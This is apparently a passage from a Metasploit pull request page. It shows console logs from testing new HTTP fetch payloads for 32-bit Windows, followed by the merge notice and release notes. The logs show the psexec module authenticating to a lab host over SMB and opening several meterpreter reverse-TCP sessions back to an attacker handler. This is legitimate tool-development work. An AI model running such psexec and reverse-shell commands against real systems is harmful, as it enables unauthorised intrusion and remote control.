[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 2 opened (192.168.250.227:4444 -> 192.168.250.89:57472) at 2026-04-01 14:30:55 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\XvDGTAexlGCd.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.10 - Meterpreter session 2 closed.  Reason: User exit
[*] 192.168.159.10 - Meterpreter session 2 closed.  Reason: Died
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/http/x86/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/http/x86/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 3 opened (192.168.250.227:4444 -> 192.168.250.89:55212) at 2026-04-01 14:31:40 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\SLYtMOatookFpT.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 3

[*] 192.168.159.10 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/http/x64/meterpreter_reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter_reverse_tcp
msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.250.227:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Meterpreter session 4 opened (192.168.250.227:4444 -> 192.168.250.89:55354) at 2026-04-01 14:33:15 -0400
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\XlLZuWCT.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > exit
[*] Shutting down session: 4

[*] 192.168.159.10 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(windows/smb/psexec) > 

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban Apr 1, 2026
@smcintyre-r7 smcintyre-r7 merged commit 3f757d9 into rapid7:master Apr 1, 2026
50 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban Apr 1, 2026
@smcintyre-r7
Contributor

Release Notes

This adds HTTP and HTTPS fetch payloads for 32-bit Windows targets.

@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 1, 2026

Labels

payload rn-modules release notes for new or majorly enhanced modules

Projects

Status: Done

2 participants